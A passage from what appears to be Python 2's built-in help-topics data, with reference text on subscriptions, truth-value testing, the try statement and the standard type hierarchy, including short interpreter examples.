escaped with a preceding\nbackslash; however, both remain in the string. As a result, "\\uXXXX"\nescape sequences are only recognized when there are an odd number of\nbackslashes.\n', 'subscriptions': u'\nSubscriptions\n*************\n\nA subscription selects an item of a sequence (string, tuple or list)\nor mapping (dictionary) object:\n\n subscription ::= primary "[" expression_list "]"\n\nThe primary must evaluate to an object of a sequence or mapping type.\n\nIf the primary is a mapping, the expression list must evaluate to an\nobject whose value is one of the keys of the mapping, and the\nsubscription selects the value in the mapping that corresponds to that\nkey. (The expression list is a tuple except if it has exactly one\nitem.)\n\nIf the primary is a sequence, the expression (list) must evaluate to a\nplain integer. If this value is negative, the length of the sequence\nis added to it (so that, e.g., "x[-1]" selects the last item of "x".)\nThe resulting value must be a nonnegative integer less than the number\nof items in the sequence, and the subscription selects the item whose\nindex is that value (counting from zero).\n\nA string\'s items are characters. 
A character is not a separate data\ntype but a string of exactly one character.\n', 'truth': u'\nTruth Value Testing\n*******************\n\nAny object can be tested for truth value, for use in an "if" or\n"while" condition or as operand of the Boolean operations below. The\nfollowing values are considered false:\n\n* "None"\n\n* "False"\n\n* zero of any numeric type, for example, "0", "0L", "0.0", "0j".\n\n* any empty sequence, for example, "\'\'", "()", "[]".\n\n* any empty mapping, for example, "{}".\n\n* instances of user-defined classes, if the class defines a\n "__nonzero__()" or "__len__()" method, when that method returns the\n integer zero or "bool" value "False". [1]\n\nAll other values are considered true --- so objects of many types are\nalways true.\n\nOperations and built-in functions that have a Boolean result always\nreturn "0" or "False" for false and "1" or "True" for true, unless\notherwise stated. (Important exception: the Boolean operations "or"\nand "and" always return one of their operands.)\n', 'try': u'\nThe "try" statement\n*******************\n\nThe "try" statement specifies exception handlers and/or cleanup code\nfor a group of statements:\n\n try_stmt ::= try1_stmt | try2_stmt\n try1_stmt ::= "try" ":" suite\n ("except" [expression [("as" | ",") identifier]] ":" suite)+\n ["else" ":" suite]\n ["finally" ":" suite]\n try2_stmt ::= "try" ":" suite\n "finally" ":" suite\n\nChanged in version 2.5: In previous versions of Python,\n"try"..."except"..."finally" did not work. "try"..."except" had to be\nnested in "try"..."finally".\n\nThe "except" clause(s) specify one or more exception handlers. When no\nexception occurs in the "try" clause, no exception handler is\nexecuted. When an exception occurs in the "try" suite, a search for an\nexception handler is started. This search inspects the except clauses\nin turn until one is found that matches the exception. An expression-\nless except clause, if present, must be last; it matches any\nexception. For an except clause with an expression, that expression\nis evaluated, and the clause matches the exception if the resulting\nobject is "compatible" with the exception. An object is compatible\nwith an exception if it is the class or a base class of the exception\nobject, or a tuple containing an item compatible with the exception.\n\nIf no except clause matches the exception, the search for an exception\nhandler continues in the surrounding code and on the invocation stack.\n[1]\n\nIf the evaluation of an expression in the header of an except clause\nraises an exception, the original search for a handler is canceled and\na search starts for the new exception in the surrounding code and on\nthe call stack (it is treated as if the entire "try" statement raised\nthe exception).\n\nWhen a matching except clause is found, the exception is assigned to\nthe target specified in that except clause, if present, and the except\nclause\'s suite is executed. All except clauses must have an\nexecutable block. When the end of this block is reached, execution\ncontinues normally after the entire try statement. 
(This means that\nif two nested handlers exist for the same exception, and the exception\noccurs in the try clause of the inner handler, the outer handler will\nnot handle the exception.)\n\nBefore an except clause\'s suite is executed, details about the\nexception are assigned to three variables in the "sys" module:\n"sys.exc_type" receives the object identifying the exception;\n"sys.exc_value" receives the exception\'s parameter;\n"sys.exc_traceback" receives a traceback object (see section The\nstandard type hierarchy) identifying the point in the program where\nthe exception occurred. These details are also available through the\n"sys.exc_info()" function, which returns a tuple "(exc_type,\nexc_value, exc_traceback)". Use of the corresponding variables is\ndeprecated in favor of this function, since their use is unsafe in a\nthreaded program. As of Python 1.5, the variables are restored to\ntheir previous values (before the call) when returning from a function\nthat handled an exception.\n\nThe optional "else" clause is executed if and when control flows off\nthe end of the "try" clause. [2] Exceptions in the "else" clause are\nnot handled by the preceding "except" clauses.\n\nIf "finally" is present, it specifies a \'cleanup\' handler. The "try"\nclause is executed, including any "except" and "else" clauses. If an\nexception occurs in any of the clauses and is not handled, the\nexception is temporarily saved. The "finally" clause is executed. If\nthere is a saved exception, it is re-raised at the end of the\n"finally" clause. If the "finally" clause raises another exception or\nexecutes a "return" or "break" statement, the saved exception is\ndiscarded:\n\n >>> def f():\n ... try:\n ... 1/0\n ... finally:\n ... return 42\n ...\n >>> f()\n 42\n\nThe exception information is not available to the program during\nexecution of the "finally" clause.\n\nWhen a "return", "break" or "continue" statement is executed in the\n"try" suite of a "try"..."finally" statement, the "finally" clause is\nalso executed \'on the way out.\' A "continue" statement is illegal in\nthe "finally" clause. (The reason is a problem with the current\nimplementation --- this restriction may be lifted in the future).\n\nThe return value of a function is determined by the last "return"\nstatement executed. Since the "finally" clause always executes, a\n"return" statement executed in the "finally" clause will always be the\nlast one executed:\n\n >>> def foo():\n ... try:\n ... return \'try\'\n ... finally:\n ... return \'finally\'\n ...\n >>> foo()\n \'finally\'\n\nAdditional information on exceptions can be found in section\nExceptions, and information on using the "raise" statement to generate\nexceptions may be found in section The raise statement.\n', 'types': u'\nThe standard type hierarchy\n***************************\n\nBelow is a list of the types that are built into Python. Extension\nmodules (written in C, Java, or other languages, depending on the\nimplementation) can define additional types. Future versions of\nPython may add types to the type hierarchy (e.g., rational numbers,\nefficiently stored arrays of integers, etc.).\n\nSome of the type descriptions below contain a paragraph listing\n\'special attributes.\' These are attributes that provide access to the\nimplementation and are not intended for general use. Their definition\nmay change in the future.\n\nNone\n This type has a single value. There is a single object with this\n value. This object is accessed through the built-in name "None". 
It\n is used to signify the absence of a value in many situations, e.g.,\n it is returned from functions that don\'t explicitly return\n anything. Its truth value is false.\n\nNotImplemented\n This type has a single value. There is a single object with this\n value. This object is accessed through the built-in name\n "NotImplemented". Numeric methods and rich comparison methods may\n return this value if they do not implement the operation for the\n operands provided. (The interpreter will then try the reflected\n operation, or some other fallback, depending on the operator.) Its\n truth value is true.\n\nEllipsis\n This type has a single value. There is a single object with this\n value. This object is accessed through the built-in name\n "Ellipsis". It is used to indicate the presence of the "..." syntax\n in a slice. Its truth value is true.\n\n"numbers.Number"\n These are created by numeric literals and returned as results by\n arithmetic operators and arithmetic built-in functions. Numeric\n objects are immutable; once created their value never changes.\n Python numbers are of course strongly related to mathematical\n numbers, but subject to the limitations of numerical representation\n in computers.\n\n Python distinguishes between integers, floating point numbers, and\n complex numbers:\n\n "numbers.Integral"\n These represent elements from the mathematical set of integers\n (positive and negative).\n\n There are three types of integers:\n\n Plain integers\n These represent numbers in the range -2147483648 through\n 2147483647. (The range may be larger on machines with a\n larger natural word size, but not smaller.) When the result\n of an operation would fall outside this range, the result is\n normally returned as a long integer (in some cases, the\n exception "OverflowError" is raised instead). For the\n purpose of shift and mask operations, integers are assumed to\n have a binary, 2\'s complement notation using 32 or more bits,\n and hiding no bits from the user (i.e., all 4294967296\n different bit patterns correspond to different values).\n\n Long integers\n These represent numbers in an unlimited range, subject to\n available (virtual) memory only. For the purpose of shift\n and mask operations, a binary representation is assumed, and\n negative numbers are represented in a variant of 2\'s\n complement which gives the illusion of an infinite string of\n sign bits extending to the left.\n\n Booleans\n These represent the truth values False and True. The two\n objects representing the values "False" and "True" are the\n only Boolean objects. The Boolean type is a subtype of plain\n integers, and Boolean values behave like the values 0 and 1,\n respectively, in almost all contexts, the exception being\n that when converted to a string, the strings ""False"" or\n ""True"" are returned, respectively.\n\n The rules for integer representation are intended to give the\n most meaningful interpretation of shift and mask operations\n involving negative integers and the least surprises when\n switching between the plain and long integer domains. Any\n operation, if it yields a result in the plain integer domain,\n will yield the same result in the long integer domain or when\n using mixed operands. The switch between domains is transparent\n to the programmer.\n\n "numbers.Real" ("float")\n These represent machine-level double precision floating point\n numbers. 
You are at the mercy of the underlying machine\n architecture (and C or Java implementation) for the accepted\n range and handling of overflow. Python does not support single-\n precision floating point numbers; the savings in processor and\n memory usage that are usually the reason for using these are\n dwarfed by the overhead of using objects in Python, so there is\n no reason to complicate the language with two kinds of floating\n point numbers.\n\n "numbers.Complex"\n These represent complex numbers as a pair of machine-level\n double precision floating point numbers. The same caveats apply\n as for floating point numbers. The real and imaginary parts of a\n complex number "z" can be retrieved through the read-only\n attributes "z.real" and "z.imag".\n\nSequences\n These represent finite ordered sets indexed by non-negative\n numbers. The built-in function "len()" returns the number of items\n of a sequence. When the length of a sequence is *n*, the index set\n contains the numbers 0, 1, ..., *n*-1. Item *i* of sequence *a* is\n selected by "a[i]".\n\n Sequences also support slicing: "a[i:j]" selects all items with\n index *k* such that *i* "<=" *k* "<" *j*. When used as an\n expression, a slice is a sequence of the same type. This implies\n that the index set is renumbered so that it starts at 0.\n\n Some sequences also support "extended slicing" with a third "step"\n parameter: "a[i:j:k]" selects all items of *a* with index *x* where\n "x = i + n*k", *n* ">=" "0" and *i* "<=" *x* "<" *j*.\n\n Sequences are distinguished according to their mutability:\n\n Immutable sequences\n An object of an immutable sequence type cannot change once it is\n created. (If the object contains references to other objects,\n these other objects may be mutable and may be changed; however,\n the collection of objects directly referenced by an immutable\n object cannot change.)\n\n The following types are immutable sequences:\n\n Strings\n The items of a string are characters. There is no separate\n character type; a character is represented by a string of one\n item. Characters represent (at least) 8-bit bytes. The\n built-in functions "chr()" and "ord()" convert between\n characters and nonnegative integers representing the byte\n values. Bytes with the values 0-127 usually represent the\n corresponding ASCII values, but the interpretation of values\n is up to the program. The string data type is also used to\n represent arrays of bytes, e.g., to hold data read from a\n file.\n\n (On systems whose native character set is not ASCII, strings\n may use EBCDIC in their internal representation, provided the\n functions "chr()" and "ord()" implement a mapping between\n ASCII and EBCDIC, and string comparison preserves the ASCII\n order. Or perhaps someone can propose a better rule?)\n\n Unicode\n The items of a Unicode object are Unicode code units. A\n Unicode code unit is represented by a Unicode object of one\n item and can hold either a 16-bit or 32-bit value\n representing a Unicode ordinal (the maximum value for the\n ordinal is given in "sys.maxunicode", and depends on how\n Python is configured at compile time). Surrogate pairs may\n be present in the Unicode object, and will be reported as two\n separate items. The built-in functions "unichr()" and\n "ord()" convert between code units and nonnegative integers\n representing the Unicode ordinals as defined in the Unicode\n Standard 3.0. 
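For example:\n\n >>> ord(u"\\u20ac")\n 8364\n >>> unichr(8364) == u"\\u20ac"\n True\n\n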
Conversion from and to other encodings is\n possible through the Unicode method "encode()" and the built-\n in function "unicode()".\n\n Tuples\n The items of a tuple are arbitrary Python objects. Tuples of\n two or more items are formed by comma-separated lists of\n expressions. A tuple of one item (a \'singleton\') can be\n formed by affixing a comma to an expression (an expression by\n itself does not create a tuple, since parentheses must be\n usable for grouping of expressions). An empty tuple can be\n formed by an empty pair of parentheses.\n\n Mutable sequences\n Mutable sequences can be changed after they are created. The\n subscription and slicing notations can be used as the target of\n assignment and "del" (delete) statements.\n\n There are currently two intrinsic mutable sequence types:\n\n Lists\n The items of a list are arbitrary Python objects. Lists are\n formed by placing a comma-separated list of expressions in\n square brackets. (Note that there are no special cases needed\n to form lists of length 0 or 1.)\n\n Byte Arrays\n A bytearray object is a mutable array. They are created by\n the built-in "bytearray()" constructor. Aside from being\n mutable (and hence unhashable), byte arrays otherwise provide\n the same interface and functionality as immutable bytes\n objects.\n\n The extension module "array" provides an additional example of a\n mutable sequence type.\n\nSet types\n These represent unordered, finite sets of unique, immutable\n objects. As such, they cannot be indexed by any subscript. However,\n they can be iterated over, and the built-in function "len()"\n returns the number of items in a set. Common uses for sets are fast\n membership testing, removing duplicates from a sequence, and\n computing mathematical operations such as intersection, union,\n difference, and symmetric difference.\n\n For set elements, the same immutability rules apply as for\n dictionary keys. Note that numeric types obey the normal rules for\n numeric comparison: if two numbers compare equal (e.g., "1" and\n "1.0"), only one of them can be contained in a set.\n\n There are currently two intrinsic set types:\n\n Sets\n These represent a mutable set. They are created by the built-in\n "set()" constructor and can be modified afterwards by several\n methods, such as "add()".\n\n Frozen sets\n These represent an immutable set. They are created by the\n built-in "frozenset()" constructor. As a frozenset is immutable\n and *hashable*, it can be used again as an element of another\n set, or as a dictionary key.\n\nMappings\n These represent finite sets of objects indexed by arbitrary index\n sets. The subscript notation "a[k]" selects the item indexed by "k"\n from the mapping "a"; this can be used in expressions and as the\n target of assignments or "del" statements. The built-in function\n "len()" returns the number of items in a mapping.\n\n There is currently a single intrinsic mapping type:\n\n Dictionaries\n These represent finite sets of objects indexed by nearly\n arbitrary values. 
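For example, a mutable list is\n rejected as a key:\n\n >>> {[1, 2]: "value"}\n Traceback (most recent call last):\n File "<stdin>", line 1, in <module>\n TypeError: unhashable type: \'list\'\n\n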
The only types of values not acceptable as\n keys are values containing lists or dictionaries or other\n mutable types that are compared by value rather than by object\n identity, the reason being that the efficient implementation of\n dictionaries requires a key\'s hash value to remain constant.\n Numeric types used for keys obey the normal rules for numeric\n comparison: if two numbers compare equal (e.g., "1" and "1.0")\n then they can be used interchangeably to index the same\n dictionary entry.\n\n Dictionaries are mutable; they can be created by the "{...}"\n notation (see section Dictionary displays).\n\n The extension modules "dbm", "gdbm", and "bsddb" provide\n additional examples of mapping types.\n\nCallable types\n These are the types to which the function call operation (see\n section Calls) can be applied:\n\n User-defined functions\n A user-defined function object is created by a function\n definition (see section Function definitions). It should be\n called with an argument list containing the same number of items\n as the function\'s formal parameter list.\n\n Special attributes:\n\n +-------------------------+---------------------------------+-------------+\n | Attribute | Meaning | |\n +=========================+=================================+=============+\n | "__doc__" "func_doc" | The function\'s documentation | Writable |\n | | string, or "None" if | |\n | | unavailable. | |\n +-------------------------+---------------------------------+-------------+\n | "__name__" "func_name" | The function\'s name. | Writable |\n +-------------------------+---------------------------------+-------------+\n | "__module__" | The name of the module the | Writable |\n | | function was defined in, or | |\n | | "None" if unavailable. | |\n +-------------------------+---------------------------------+-------------+\n | "__defaults__" | A tuple containing default | Writable |\n | "func_defaults" | argument values for those | |\n | | arguments that have defaults, | |\n | | or "None" if no arguments have | |\n | | a default value. | |\n +-------------------------+---------------------------------+-------------+\n | "__code__" "func_code" | The code object representing | Writable |\n | | the compiled function body. | |\n +-------------------------+---------------------------------+-------------+\n | "__globals__" | A reference to the dictionary | Read-only |\n | "func_globals" | that holds the function\'s | |\n | | global variables --- the global | |\n | | namespace of the module in | |\n | | which the function was defined. | |\n +-------------------------+---------------------------------+-------------+\n | "__dict__" "func_dict" | The namespace supporting | Writable |\n | | arbitrary function attributes. | |\n +-------------------------+---------------------------------+-------------+\n | "__closure__" | "None" or a tuple of cells that | Read-only |\n | "func_closure" | contain bindings for the | |\n | | function\'s free variables. 
| |\n +-------------------------+---------------------------------+-------------+\n\n Most of the attributes labelled "Writable" check the type of the\n assigned value.\n\n Changed in version 2.4: "func_name" is now writable.\n\n Changed in version 2.6: The double-underscore attributes\n "__closure__", "__code__", "__defaults__", and "__globals__"\n were introduced as aliases for the corresponding "func_*"\n attributes for forwards compatibility with Python 3.\n\n Function objects also support getting and setting arbitrary\n attributes, which can be used, for example, to attach metadata\n to functions. Regular attribute dot-notation is used to get and\n set such attributes. *Note that the current implementation only\n supports function attributes on user-defined functions. Function\n attributes on built-in functions may be supported in the\n future.*\n\n Additional information about a function\'s definition can be\n retrieved from its code object; see the description of internal\n types below.\n\n User-defined methods\n A user-defined method object combines a class, a class instance\n (or "None") and any callable object (normally a user-defined\n function).\n\n Special read-only attributes: "im_self" is the class instance\n object, "im_func" is the function object; "im_class" is the\n class of "im_self" for bound methods or the class that asked for\n the method for unbound methods; "__doc__" is the method\'s\n documentation (same as "im_func.__doc__"); "__name__" is the\n method name (same as "im_func.__name__"); "__module__" is the\n name of the module the method was defined in, or "None" if\n unavailable.\n\n Changed in version 2.2: "im_self" used to refer to the class\n that defined the method.\n\n Changed in version 2.6: For Python 3 forward-compatibility,\n "im_func" is also available as "__func__", and "im_self" as\n "__self__".\n\n Methods also support accessing (but not setting) the arbitrary\n function attributes on the underlying function object.\n\n User-defined method objects may be created when getting an\n attribute of a class (perhaps via an instance of that class), if\n that attribute is a user-defined function object, an unbound\n user-defined method object, or a class method object. When the\n attribute is a user-defined method object, a new method object\n is only created if the class from which it is being retrieved is\n the same as, or a derived class of, the class stored in the\n original method object; otherwise, the original method object is\n used as it is.\n\n When a user-defined method object is created by retrieving a\n user-defined function object from a class, its "im_self"\n attribute is "None" and the method object is said to be unbound.\n When one is created by retrieving a user-defined function object\n from a class via one of its instances, its "im_self" attribute\n is the instance, and the method object is said to be bound. 
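A short\n sketch (the names "C" and "f" are invented for this example):\n\n >>> class C(object):\n ... def f(self):\n ... pass\n ...\n >>> C.f.im_self is None\n True\n >>> c = C()\n >>> c.f.im_self is c\n True\n\n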
In\n either case, the new method\'s "im_class" attribute is the class\n from which the retrieval takes place, and its "im_func"\n attribute is the original function object.\n\n When a user-defined method object is created by retrieving\n another method object from a class or instance, the behaviour is\n the same as for a function object, except that the "im_func"\n attribute of the new instance is not the original method object\n but its "im_func" attribute.\n\n When a user-defined method object is created by retrieving a\n class method object from a class or instance, its "im_self"\n attribute is the class itself, and its "im_func" attribute is\n the function object underlying the class method.\n\n When an unbound user-defined method object is called, the\n underlying function ("im_func") is called, with the restriction\n that the first argument must be an instance of the proper class\n ("im_class") or of a derived class thereof.\n\n When a bound user-defined method object is called, the\n underlying function ("im_func") is called, inserting the class\n instance ("im_self") in front of the argument list. For\n instance, when "C" is a class which contains a definition for a\n function "f()", and "x" is an instance of "C", calling "x.f(1)"\n is equivalent to calling "C.f(x, 1)".\n\n When a user-defined method object is derived from a class method\n object, the "class instance" stored in "im_self" will actually\n be the class itself, so that calling either "x.f(1)" or "C.f(1)"\n is equivalent to calling "f(C,1)" where "f" is the underlying\n function.\n\n Note that the transformation from function object to (unbound or\n bound) method object happens each time the attribute is\n retrieved from the class or instance. In some cases, a fruitful\n optimization is to assign the attribute to a local variable and\n call that local variable. Also notice that this transformation\n only happens for user-defined functions; other callable objects\n (and all non-callable objects) are retrieved without\n transformation. It is also important to note that user-defined\n functions which are attributes of a class instance are not\n converted to bound methods; this *only* happens when the\n function is an attribute of the class.\n\n Generator functions\n A function or method which uses the "yield" statement (see\n section The yield statement) is called a *generator function*.\n Such a function, when called, always returns an iterator object\n which can be used to execute the body of the function: calling\n the iterator\'s "next()" method will cause the function to\n execute until it provides a value using the "yield" statement.\n When the function executes a "return" statement or falls off the\n end, a "StopIteration" exception is raised and the iterator will\n have reached the end of the set of values to be returned.\n\n Built-in functions\n A built-in function object is a wrapper around a C function.\n Examples of built-in functions are "len()" and "math.sin()"\n ("math" is a standard built-in module). The number and type of\n the arguments are determined by the C function. 
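For example, in CPython:\n\n >>> type(len)\n <type \'builtin_function_or_method\'>\n >>> len.__name__\n \'len\'\n\n 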
Special read-\n only attributes: "__doc__" is the function\'s documentation\n string, or "None" if unavailable; "__name__" is the function\'s\n name; "__self__" is set to "None" (but see the next item);\n "__module__" is the name of the module the function was defined\n in or "None" if unavailable.\n\n Built-in methods\n This is really a different disguise of a built-in function, this\n time containing an object passed to the C function as an\n implicit extra argument. An example of a built-in method is\n "alist.append()", assuming *alist* is a list object. In this\n case, the special read-only attribute "__self__" is set to the\n object denoted by *alist*.\n\n Class Types\n Class types, or "new-style classes," are callable. These\n objects normally act as factories for new instances of\n themselves, but variations are possible for class types that\n override "__new__()". The arguments of the call are passed to\n "__new__()" and, in the typical case, to "__init__()" to\n initialize the new instance.\n\n Classic Classes\n Class objects are described below. When a class object is\n called, a new class instance (also described below) is created\n and returned. This implies a call to the class\'s "__init__()"\n method if it has one. Any arguments are passed on to the\n "__init__()" method. If there is no "__init__()" method, the\n class must be called without arguments.\n\n Class instances\n Class instances are described below. Class instances are\n callable only when the class has a "__call__()" method;\n "x(arguments)" is a shorthand for "x.__call__(arguments)".\n\nModules\n Modules are imported by the "import" statement (see section The\n import statement). A module object has a namespace implemented by a\n dictionary object (this is the dictionary referenced by the\n func_globals attribute of functions defined in the module).\n Attribute references are translated to lookups in this dictionary,\n e.g., "m.x" is equivalent to "m.__dict__["x"]". A module object\n does not contain the code object used to initialize the module\n (since it isn\'t needed once the initialization is done).\n\n Attribute assignment updates the module\'s namespace dictionary,\n e.g., "m.x = 1" is equivalent to "m.__dict__["x"] = 1".\n\n Special read-only attribute: "__dict__" is the module\'s namespace\n as a dictionary object.\n\n **CPython implementation detail:** Because of the way CPython\n clears module dictionaries, the module dictionary will be cleared\n when the module falls out of scope even if the dictionary still has\n live references. To avoid this, copy the dictionary or keep the\n module around while using its dictionary directly.\n\n Predefined (writable) attributes: "__name__" is the module\'s name;\n "__doc__" is the module\'s documentation string, or "None" if\n unavailable; "__file__" is the pathname of the file from which the\n module was loaded, if it was loaded from a file. The "__file__"\n attribute is not present for C modules that are statically linked\n into the interpreter; for extension modules loaded dynamically from\n a shared library, it is the pathname of the shared library file.\n\nClasses\n Both class types (new-style classes) and class objects (old-\n style/classic classes) are typically created by class definitions\n (see section Class definitions). A class has a namespace\n implemented by a dictionary object. 
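For example, the namespace dictionary can be inspected directly:\n\n >>> class C(object):\n ... x = 1\n ...\n >>> C.__dict__[\'x\']\n 1\n\n 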
Class attribute references are\n translated to lookups in this dictionary, e.g., "C.x" is translated\n to "C.__dict__["x"]" (although for new-style classes in particular\n there are a number of hooks which allow for other means of locating\n attributes). When the attribute name is not found there, the\n attribute search continues in the base classes. For old-style\n classes, the search is depth-first, left-to-right in the order of\n occurrence in the base class list. New-style classes use the more\n complex C3 method resolution order which behaves correctly even in\n the presence of \'diamond\' inheritance structures where there are\n multiple inheritance paths leading back to a common ancestor.\n Additional details on the C3 MRO used by new-style classes can be\n found in the documentation accompanying the 2.3 release at\n https://www.python.org/download/releases/2.3/mro/.\n\n When a class attribute reference (for class "C", say) would yield a\n user-defined function object or an unbound user-defined method\n object whose associated class is either "C" or one of its base\n classes, it is transformed into an unbound user-defined method\n object whose "im_class" attribute is "C". When it would yield a\n class method object, it is transformed into a bound user-defined\n method object whose "im_self" attribute is "C". When it would\n yield a static method object, it is transformed into the object\n wrapped by the static method object. See section Implementing\n Descriptors for another way in which attributes retrieved from a\n class may differ from those actually contained in its "__dict__"\n (note that only new-style classes support descriptors).\n\n Class attribute assignments update the class\'s dictionary, never\n the dictionary of a base class.\n\n A class object can be called (see above) to yield a class instance\n (see below).\n\n Special attributes: "__name__" is the class name; "__module__" is\n the module name in which the class was defined; "__dict__" is the\n dictionary containing the class\'s namespace; "__bases__" is a tuple\n (possibly empty or a singleton) containing the base classes, in the\n order of their occurrence in the base class list; "__doc__" is the\n class\'s documentation string, or None if undefined.\n\nClass instances\n A class instance is created by calling a class object (see above).\n A class instance has a namespace implemented as a dictionary which\n is the first place in which attribute references are searched.\n When an attribute is not found there, and the instance\'s class has\n an attribute by that name, the search continues with the class\n attributes. If a class attribute is found that is a user-defined\n function object or an unbound user-defined method object whose\n associated class is the class (call it "C") of the instance for\n which the attribute reference was initiated or one of its bases, it\n is transformed into a bound user-defined method object whose\n "im_class" attribute is "C" and whose "im_self" attribute is the\n instance. Static method and class method objects are also\n transformed, as if they had been retrieved from class "C"; see\n above under "Classes". See section Implementing Descriptors for\n another way in which attributes of a class retrieved via its\n instances may differ from the objects actually stored in the\n class\'s "__dict__". 
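For example, the bound method records both the instance and the\n class:\n\n >>> class C(object):\n ... def f(self):\n ... return 1\n ...\n >>> x = C()\n >>> x.f.im_self is x\n True\n >>> x.f.im_class is C\n True\n\n 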
If no class attribute is found, and the\n object\'s class has a "__getattr__()" method, that is called to\n satisfy the lookup.\n\n Attribute assignments and deletions update the instance\'s\n dictionary, never a class\'s dictionary. If the class has a\n "__setattr__()" or "__delattr__()" method, this is called instead\n of updating the instance dictionary directly.\n\n Class instances can pretend to be numbers, sequences, or mappings\n if they have methods with certain special names. See section\n Special method names.\n\n Special attributes: "__dict__" is the attribute dictionary;\n "__class__" is the instance\'s class.\n\nFiles\n A file object represents an open file. File objects are created by\n the "open()" built-in function, and also by "os.popen()",\n "os.fdopen()", and the "makefile()" method of socket objects (and\n perhaps by other functions or methods provided by extension\n modules). The objects "sys.stdin", "sys.stdout" and "sys.stderr"\n are initialized to file objects corresponding to the interpreter\'s\n standard input, output and error streams. See File Objects for\n complete documentation of file objects.\n\nInternal types\n A few types used internally by the interpreter are exposed to the\n user. Their definitions may change with future versions of the\n interpreter, but they are mentioned here for completeness.\n\n Code objects\n Code objects represent *byte-compiled* executable Python code,\n or *bytecode*. The difference between a code object and a\n function object is that the function object contains an explicit\n reference to the function\'s globals (the module in which it was\n defined), while a code object contains no context; also the\n default argument values are stored in the function object, not\n in the code object (because they represent values calculated at\n run-time). 
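For example, default values live on the function object while the\n compiled body lives on its code object:\n\n >>> def f(x, y=2):\n ... return x + y\n ...\n >>> f.__defaults__\n (2,)\n >>> f.__code__ is f.func_code\n True\n\n 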
Unlike function objects, code objects are immutable\n and contain no references (directly or indirectly) to mutable\n objects.\n\n Special read-only attributes: "co_name" gives the function name;\n "co_argcount" is the number of positional arguments (including\n arguments with default values); "co_nlocals" is the number of\n local variables used by the function (including arguments);\n "co_varnames" is a tuple containing the names of the local\n variables (starting with the argument names); "co_cellvars" is a\n tuple containing the names of local variables that are\n referenced by nested functions; "co_freevars" is a tuple\n containing the names of free variables; "co_code" is a string\n representing the sequence of bytecode instructions; "co_consts"\n is a tuple containing the literals used by the bytecode;\n "co_names" is a tuple containing the names used by the bytecode;\n "co_filename" is the filename from which the code was compiled;\n "co_firstlineno" is the first line number of the function;\n "co_lnotab" is a string encoding the mapping from bytecode\n offsets to line numbers (for details see the source code of the\n interpreter); "co_stacksize" is the required stack size\n (including local variables); "co_flags" is an integer encoding a\n number of flags for the interpreter.\n\n The following flag bits are defined for "co_flags": bit "0x04"\n is set if the function uses the "*arguments" syntax to accept an\n arbitrary number of positional arguments; bit "0x08" is set if\n the function uses the "**keywords" syntax to accept arbitrary\n keyword arguments; bit "0x20" is set if the function is a\n generator.\n\n Future feature declarations ("from __future__ import division")\n also use bits in "co_flags" to indicate whether a code object\n was compiled with a particular feature enabled: bit "0x2000" is\n set if the function was compiled with future division enabled;\n bits "0x10" and "0x1000" were used in earlier versions of\n Python.\n\n Other bits in "co_flags" are reserved for internal use.\n\n If a code object represents a function, the first item in\n "co_consts" is the documentation string of the function, or\n "None" if undefined.\n\n Frame objects\n Frame objects represent execution frames. They may occur in\n traceback objects (see below).\n\n Special read-only attributes: "f_back" points to the previous stack\n frame (towards the caller), or "None" if this is the bottom\n stack frame; "f_code" is the code object being executed in this\n frame; "f_locals" is the dictionary used to look up local\n variables; "f_globals" is used for global variables;\n "f_builtins" is used for built-in (intrinsic) names;\n "f_restricted" is a flag indicating whether the function is\n executing in restricted execution mode; "f_lasti" gives the\n precise instruction (this is an index into the bytecode string\n of the code object).\n\n Special writable attributes: "f_trace", if not "None", is a\n function called at the start of each source code line (this is\n used by the debugger); "f_exc_type", "f_exc_value",\n "f_exc_traceback" represent the last exception raised in the\n parent frame provided another exception was ever raised in the\n current frame (in all other cases they are None); "f_lineno" is\n the current line number of the frame --- writing to this from\n within a trace function jumps to the given line (only for the\n bottom-most frame). 
A debugger can implement a Jump command\n (aka Set Next Statement) by writing to f_lineno.\n\n Traceback objects\n Traceback objects represent a stack trace of an exception. A\n traceback object is created when an exception occurs. When the\n search for an exception handler unwinds the execution stack, at\n each unwound level a traceback object is inserted in front of\n the current traceback. When an exception handler is entered,\n the stack trace is made available to the program. (See section\n The try statement.) It is accessible as "sys.exc_traceback", and\n also as the third item of the tuple returned by\n "sys.exc_info()". The latter is the preferred interface, since\n it works correctly when the program is using multiple threads.\n When the program contains no suitable handler, the stack trace\n is written (nicely formatted) to the standard error stream; if\n the interpreter is interactive, it is also made available to the\n user as "sys.last_traceback".\n\n Special read-only attributes: "tb_next" is the next level in the\n stack trace (towards the frame where the exception occurred), or\n "None" if there is no next level; "tb_frame" points to the\n execution frame of the current level; "tb_lineno" gives the line\n number where the exception occurred; "tb_lasti" indicates the\n precise instruction. The line number and last instruction in\n the traceback may differ from the line number of its frame\n object if the exception occurred in a "try" statement with no\n matching except clause or with a finally clause.\n\n Slice objects\n Slice objects are used to represent slices when *extended slice\n syntax* is used. This is a slice using two colons, or multiple\n slices or ellipses separated by commas, e.g., "a[i:j:step]",\n "a[i:j, k:l]", or "a[..., i:j]". They are also created by the\n built-in "slice()" function.\n\n Special read-only attributes: "start" is the lower bound; "stop"\n is the upper bound; "step" is the step value; each is "None" if\n omitted. These attributes can have any type.\n\n Slice objects support one method:\n\n slice.indices(self, length)\n\n This method takes a single integer argument *length* and\n computes information about the extended slice that the slice\n object would describe if applied to a sequence of *length*\n items. It returns a tuple of three integers; respectively\n these are the *start* and *stop* indices and the *step* or\n stride length of the slice. Missing or out-of-bounds indices\n are handled in a manner consistent with regular slices.\n\n New in version 2.3.\n\n Static method objects\n Static method objects provide a way of defeating the\n transformation of function objects to method objects described\n above. A static method object is a wrapper around any other\n object, usually a user-defined method object. When a static\n method object is retrieved from a class or a class instance, the\n object actually returned is the wrapped object, which is not\n subject to any further transformation. Static method objects are\n not themselves callable, although the objects they wrap usually\n are. Static method objects are created by the built-in\n "staticmethod()" constructor.\n\n Class method objects\n A class method object, like a static method object, is a wrapper\n around another object that alters the way in which that object\n is retrieved from classes and class instances. The behaviour of\n class method objects upon such retrieval is described above,\n under "User-defined methods". 
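For example:\n\n >>> class C(object):\n ... def f(cls):\n ... return cls.__name__\n ... f = classmethod(f)\n ...\n >>> C.f()\n \'C\'\n >>> C().f()\n \'C\'\n\n 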
